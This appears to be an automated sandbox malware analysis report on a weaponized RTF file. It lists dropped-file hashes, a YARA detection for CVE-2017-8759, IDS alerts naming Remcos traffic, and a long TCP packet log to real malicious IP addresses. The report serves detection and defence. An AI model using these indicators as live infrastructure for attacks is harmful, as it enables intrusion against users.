                                                SHA1:65722A25990AE2E4FB5F096DA1B56A22EF797186
                                                SHA-256:36191CD42B792833D28DB73F7C449A6D5C03C1AB73C365B5F29464658870DD9B
                                                SHA-512:8F32ADD6A86B55CE00FB9A7DC9094A8EF38AAD5AF228E3454B87EB73ABFA079CCD3A850C2AA459CBF9934E68E869CD5680DDD30BFE510F899992C78A915194BD
                                                Malicious:true
                                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New

                                                C:\Users\user\Desktop\~$xnHel.rtf

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707526
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyVFuAGlYViuWCHlkkAi/lln:vdsCkWteuAyYLvAyll
                                                MD5:5A248DD99654CB4793F2457BEE4E69C1
                                                SHA1:9DA63BD05ECA3E441B135C705B425B562E5CA494
                                                SHA-256:73FA49E819EEA9D2CA5024559E4730AC8EE873B526EA79B35082C2ED6E644C0A
                                                SHA-512:1FDB3C71240EBA121A74E2F770F17E30DB67D5812445A7FFB8AA85BE224BA36A5F3CCF818D84EA44579815F5F065AC911D2016F4DC1E4FE64073B3AF4CED3EBB
                                                Malicious:true
                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                C:\Users\user\Desktop\~WRD0000.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                Category:dropped
                                                Size (bytes):53991
                                                Entropy (8bit):5.278517042525491
                                                Encrypted:false
                                                SSDEEP:384:323tHbrN79ozVzEFH3WZ4YEw9KNrNz/wGvXpWDWOsBbOc++f6PsdeJ6ot7oQT9Az:323b3WZHqwGv5OcJRolx2AhAZqCD
                                                MD5:F3E54D580A9F92666E29A8F90DD80B9E
                                                SHA1:65722A25990AE2E4FB5F096DA1B56A22EF797186
                                                SHA-256:36191CD42B792833D28DB73F7C449A6D5C03C1AB73C365B5F29464658870DD9B
                                                SHA-512:8F32ADD6A86B55CE00FB9A7DC9094A8EF38AAD5AF228E3454B87EB73ABFA079CCD3A850C2AA459CBF9934E68E869CD5680DDD30BFE510F899992C78A915194BD
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2, Description: detects CVE-2017-8759 weaponized RTF documents., Source: C:\Users\user\Desktop\~WRD0000.tmp, Author: ditekSHen
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New

                                                C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                Static File Info

                                                General

                                                File type:Rich Text Format data, version 1
                                                Entropy (8bit):2.6091410392694163
                                                TrID:
                                                • Rich Text Format (5005/1) 55.56%
                                                • Rich Text Format (4004/1) 44.44%
                                                File name:xnHel.rtf
                                                File size:116'087 bytes
                                                MD5:0cedaf043bf1a0c4ccef486f9ec8cbd2
                                                SHA1:d765d29e6a05ba6e72b8d718ade5f32f1379ebe5
                                                SHA256:c34202144bc27f5a4ee328d03412eecc9241d75c4bffa44f40a41ce5c7340b0c
                                                SHA512:c576785068678507e6b3b760e6732f5c8ff0734293eeadbc425808d3289f6f50efaf3ce882f6e384ba0f03430abdf81364be89109e41a0cf32c936a9a20fed61
                                                SSDEEP:768:K+RwShDWHJfw1CwwHOgaqeavIu2+0bdgBnpo0ICp:K+SEDNHwHRaqju+0RgtaNCp
                                                TLSH:38B3DFADC34F45A5DB459377031A8E0906FCB33EB70651B678AC977137AD82E08A19B8
                                                File Content Preview:{\rtf1..............{\*\lidRegroup744016165 \+}.{\204731817<^3?!06]$+?)?%?54[;5>(#!8(.6:!5_`&[`=)%2%`&??78[4-3?/.-<)|;85]>$3(;?7+>_%%.,;57;?[;%8.0.<?75@.'5(8$2?6=#)7'4(|:91,,/+)6&:4&'56%?7??=?.*]=9?45%_72)$-@3#$[(1??.0@..)%>*21/.?5?@:_5|.!2@@7;?&$)=&?,/%2

                                                File Icon

                                                Icon Hash:2764a3aaaeb7bdbf

                                                Static RTF Info

                                                Objects

                                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                000001B1Fhno

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-09-11T20:22:23.606116+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1207.241.227.96443192.168.2.2249162TCP
                                                2024-09-11T20:22:24.732832+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1145.90.89.12380192.168.2.2249163TCP
                                                2024-09-11T20:22:24.732832+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1145.90.89.12380192.168.2.2249163TCP
                                                2024-09-11T20:22:29.656144+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224916445.90.89.988243TCP
                                                2024-09-11T20:22:31.383018+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249165178.237.33.5080TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 11, 2024 20:22:15.611242056 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:15.616354942 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:15.616426945 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:15.616658926 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:15.621737003 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.372056961 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.372076988 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.372087002 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.372117996 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.372129917 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.372131109 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.372142076 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.372158051 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.372164965 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.372176886 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.372255087 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.372267008 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.372277975 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.372288942 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.372288942 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.372303009 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.372323036 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.376707077 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.377110958 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.377146959 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.377175093 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.377207041 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.377209902 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.377221107 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.377244949 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.501849890 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.501869917 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.501880884 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.501893044 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.501904011 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.501919031 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.506638050 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.506652117 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.506683111 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.506694078 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.506701946 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.506721020 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.506735086 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.506748915 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.511380911 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.511435986 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.511441946 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.511450052 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.511462927 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.511467934 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.511476040 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.511498928 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.511498928 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.511534929 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.516141891 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.516155958 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.516174078 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.516186953 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.516202927 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.516212940 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.516218901 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.520864964 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.520879984 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.520905018 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.520916939 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.520927906 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.520956993 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.520981073 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.520981073 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.630914927 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631014109 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.631140947 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631154060 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631165981 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631185055 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.631200075 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.631238937 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631251097 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631263018 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631280899 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.631289959 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.631350994 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631364107 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631393909 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.631405115 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.631638050 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631678104 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.631747961 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631761074 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631779909 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.631794930 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.631850004 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631861925 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631872892 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.631887913 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.631899118 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.632649899 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.632662058 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.632674932 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.632693052 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.632704973 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.632735014 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.632746935 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.632757902 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.632769108 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.632785082 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.632802963 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.633599997 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.633634090 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.633646011 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.633650064 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.633667946 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.633682966 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.633743048 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.633757114 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.633769989 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.633791924 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.633804083 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.634541035 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.634597063 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.634601116 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.634613991 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.634639025 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.634648085 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.634685040 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.634696007 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.634708881 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.634731054 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.634747982 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.635519028 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.635571003 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.635620117 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.635663986 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.762514114 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762546062 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762558937 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762571096 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762582064 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762593985 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762609005 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762620926 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762633085 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762662888 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762675047 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762676954 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.762686968 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762698889 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.762726068 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.762727022 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.762727022 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.762727022 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.762727022 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.762758970 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763036966 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763381004 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763422012 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763427973 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763433933 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763454914 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763467073 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763514996 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763528109 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763537884 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763557911 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763570070 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763879061 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763921022 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763937950 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763951063 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.763972044 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.763983011 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.764030933 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764045000 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764050961 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764056921 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764112949 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.764148951 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764188051 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.764220953 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764262915 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.764833927 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764847040 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764858961 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764902115 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.764942884 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764955044 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764966965 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764981031 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.764995098 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.765014887 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.765074968 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.765089035 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.765131950 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.765748024 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.765794992 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.765796900 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.765808105 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.765876055 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.765976906 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.765990973 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766002893 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766015053 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766025066 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766045094 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766186953 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766200066 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766231060 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766695023 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766748905 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766773939 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766788006 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766815901 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766844034 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766890049 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766906023 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766917944 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766928911 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766940117 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.766942024 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766954899 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.766972065 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.767009020 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.767050982 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.768616915 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.768668890 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.768676043 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.768691063 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.768711090 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.768728018 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.768742085 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.768754005 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.768764019 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.768780947 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.768795013 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893058062 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893110991 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893167019 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893202066 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893235922 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893235922 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893235922 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893275976 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893294096 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893338919 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893352985 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893395901 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893413067 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893457890 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893465996 CEST804916145.90.89.123192.168.2.22
